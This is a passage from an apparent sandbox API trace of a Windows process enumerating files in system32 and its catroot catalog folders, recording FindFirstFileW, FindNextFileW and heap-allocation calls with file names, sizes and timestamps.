ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x762936dc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0102.901] lstrlenW (lpString="calc.exe") returned 8 [0102.901] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x92) returned 0x73afa0 [0102.901] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b352cb1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b352cb1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b352cb1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="CallButtons.dll", cAlternateFileName="")) returned 1 [0102.901] lstrlenW (lpString="CallButtons.dll") returned 15 [0102.901] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x739208 [0102.901] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b352cb1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b352cb1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b352cb1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="CallButtons.ProxyStub.dll", cAlternateFileName="")) returned 1 [0102.901] lstrlenW (lpString="CallButtons.ProxyStub.dll") returned 25 [0102.902] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb4) returned 0x73ce38 [0102.902] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744c563e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x744c563e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x744c563e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x0, dwReserved1=0x0, cFileName="CallHistoryClient.dll", cAlternateFileName="")) returned 1 [0102.902] lstrlenW (lpString="CallHistoryClient.dll") returned 21 [0102.902] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xac) returned 0x73cef8 [0102.902] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4118b5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b4118b5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b4118b5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x15200, dwReserved0=0x0, dwReserved1=0x0, cFileName="CameraCaptureUI.dll", cAlternateFileName="")) returned 1 [0102.902] lstrlenW (lpString="CameraCaptureUI.dll") returned 19 [0102.902] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72ce28 [0102.902] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96cc1b96, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96cc1b96, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96cc1b96, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="CameraSettingsUIHost.exe", cAlternateFileName="")) returned 1 [0102.902] lstrlenW (lpString="CameraSettingsUIHost.exe") returned 24 [0102.902] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb2) returned 0x732d10 [0102.902] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74406a3a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x74406a3a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x74406a3a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="canonurl.dll", cAlternateFileName="")) returned 1 [0102.902] lstrlenW (lpString="canonurl.dll") returned 12 [0102.902] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x738c20 [0102.902] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419ce7ec, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x5bbc6158, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x419ce7ec, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x41190, dwReserved0=0x0, dwReserved1=0x0, cFileName="capauthz.dll", cAlternateFileName="")) returned 1 [0102.903] lstrlenW (lpString="capauthz.dll") returned 12 [0102.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x739748 [0102.903] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfefa58, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cfefa58, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cfefa58, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x0, dwReserved1=0x0, cFileName="capiprovider.dll", cAlternateFileName="")) returned 1 [0102.903] lstrlenW (lpString="capiprovider.dll") returned 16 [0102.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72dd48 [0102.903] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d015c7c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d015c7c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d03bee0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capisp.dll", cAlternateFileName="")) returned 1 [0102.903] lstrlenW (lpString="capisp.dll") returned 10 [0102.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x73bc20 [0102.903] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e1f7cd8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e1f7cd8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e1f7cd8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x20600, dwReserved0=0x0, dwReserved1=0x0, cFileName="CastingShellExt.dll", cAlternateFileName="")) returned 1 [0102.903] lstrlenW (lpString="CastingShellExt.dll") returned 19 [0102.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72dc98 [0102.903] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18454f5f, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xffcc6fb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x18454f5f, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="catroot", cAlternateFileName="")) returned 1 [0102.903] lstrlenW (lpString="catroot") returned 7 [0102.903] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x732dd0 [0102.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\catroot\\*", lpFindFileData=0x732dd0 | out: lpFindFileData=0x732dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xde10d611, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xd298e138, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a058 [0102.904] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732dd0 | out: lpFindFileData=0x732dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xde10d611, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xd298e138, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.904] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732dd0 | out: lpFindFileData=0x732dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x180029db, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf496d54f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x180029db, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}", cAlternateFileName="{127D0~1")) returned 1 [0102.904] lstrlenW (lpString="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}") returned 38 [0102.904] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x734030 [0102.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\catroot\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x180029db, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf496d54f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x180029db, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a098 [0102.905] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x180029db, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf496d54f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x180029db, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x180029db, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf496d54f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x180029db, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.905] FindClose (in: hFindFile=0x70a098 | out: hFindFile=0x70a098) returned 1 [0102.905] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734030 | out: hHeap=0x6f0000) returned 1 [0102.905] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x732dd0 | out: lpFindFileData=0x732dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xde0e73b5, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xde0e73b5, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}", cAlternateFileName="{F750E~1")) returned 1 [0102.905] lstrlenW (lpString="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}") returned 38 [0102.905] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x734030 [0102.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xde0e73b5, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xde0e73b5, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a098 [0102.916] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xde0e73b5, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xde0e73b5, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x683682e0, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x683682e0, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0x16576c1e, ftLastWriteTime.dwHighDateTime=0x1d29fbf, nFileSizeHigh=0x0, nFileSizeLow=0x27f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe-Flash-For-Windows-onecoreuap-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Adobe-Flash-For-Windows-onecoreuap-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 83 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x683682e0, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x683682e0, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0x79a5651a, ftLastWriteTime.dwHighDateTime=0x1d29fbe, nFileSizeHigh=0x0, nFileSizeLow=0x34b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe-Flash-For-Windows-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Adobe-Flash-For-Windows-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 72 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4256ea90, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x84ac5366, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xcaab6b00, ftLastWriteTime.dwHighDateTime=0x1d29fbe, nFileSizeHigh=0x0, nFileSizeLow=0x2345, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Connectivity-CustomDeviceAccess-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 93 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688ebbcb, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x688ebbcb, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0xb08de093, ftLastWriteTime.dwHighDateTime=0x1d29fbe, nFileSizeHigh=0x0, nFileSizeLow=0x25ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Connectivity-CustomDeviceAccess-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 88 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42548832, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x84ac5366, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xc717e400, ftLastWriteTime.dwHighDateTime=0x1d29fbe, nFileSizeHigh=0x0, nFileSizeLow=0x2947, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-onecoreuap-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Connectivity-CustomDeviceAccess-onecoreuap-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 96 [0102.965] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688ebbcb, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x688ebbcb, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0xae8b7851, ftLastWriteTime.dwHighDateTime=0x1d29fbe, nFileSizeHigh=0x0, nFileSizeLow=0x2fe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-onecoreuap-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.965] lstrlenW (lpString="Connectivity-CustomDeviceAccess-onecoreuap-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 91 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42548832, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x42548832, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xc5025500, ftLastWriteTime.dwHighDateTime=0x1d29fbf, nFileSizeHigh=0x0, nFileSizeLow=0x228a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Connectivity-CustomDeviceAccess-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 85 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688ebbcb, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x688ebbcb, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0xc4e812ec, ftLastWriteTime.dwHighDateTime=0x1d29fbf, nFileSizeHigh=0x0, nFileSizeLow=0x2287, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity-CustomDeviceAccess-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Connectivity-CustomDeviceAccess-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 80 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x432192ce, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x6cb6becb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xc98d900, ftLastWriteTime.dwHighDateTime=0x1d29fe0, nFileSizeHigh=0x0, nFileSizeLow=0x2583, dwReserved0=0x0, dwReserved1=0x0, cFileName="Containers-Server-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Containers-Server-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 79 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x694b19a7, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x694b19a7, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0x1036344a, ftLastWriteTime.dwHighDateTime=0x1d29fe0, nFileSizeHigh=0x0, nFileSizeLow=0x267d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Containers-Server-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Containers-Server-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 74 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x432192ce, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x432192ce, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x66010800, ftLastWriteTime.dwHighDateTime=0x1d29fe0, nFileSizeHigh=0x0, nFileSizeLow=0x2287, dwReserved0=0x0, dwReserved1=0x0, cFileName="Containers-Server-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Containers-Server-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 71 [0102.966] FindNextFileW (in: hFindFile=0x70a098, lpFindFileData=0x734030 | out: lpFindFileData=0x734030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x694b19a7, ftCreationTime.dwHighDateTime=0x1d2a029, ftLastAccessTime.dwLowDateTime=0x694b19a7, ftLastAccessTime.dwHighDateTime=0x1d2a029, ftLastWriteTime.dwLowDateTime=0x6962d9d4, ftLastWriteTime.dwHighDateTime=0x1d29fe0, nFileSizeHigh=0x0, nFileSizeLow=0x2287, dwReserved0=0x0, dwReserved1=0x0, cFileName="Containers-Server-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat", cAlternateFileName="")) returned 1 [0102.966] lstrlenW (lpString="Containers-Server-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 66 [0102.966] lstrlenW (lpString="DeviceAccess-Universal-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 76 [0102.966] lstrlenW (lpString="DeviceAccess-Universal-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 71 [0102.966] lstrlenW (lpString="DiskIo-QoS-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 64 [0102.970] lstrlenW (lpString="DiskIo-QoS-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 59 [0102.970] lstrlenW (lpString="Fonts-MinConsoleFonts-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 75 [0102.971] lstrlenW (lpString="Fonts-MinConsoleFonts-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 70 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-base-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 78 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-base-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 73 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-mergedcomponents-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 90 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-mergedcomponents-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 85 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 81 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 76 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 73 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 68 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 76 [0102.971] lstrlenW (lpString="HyperV-Compute-Host-vm-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 71 [0102.971] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 98 [0102.971] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 93 [0102.971] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 90 [0102.973] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 85 [0102.973] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 93 [0102.973] lstrlenW (lpString="HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 88 [0102.973] lstrlenW (lpString="HyperV-Feature-Containers-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 87 [0102.973] lstrlenW (lpString="HyperV-Feature-Containers-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 82 [0102.973] lstrlenW (lpString="HyperV-Feature-Containers-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 79 [0102.973] lstrlenW (lpString="HyperV-Feature-Containers-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 74 [0102.973] lstrlenW (lpString="HyperV-Guest-DynamicMemory-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 80 [0102.973] lstrlenW 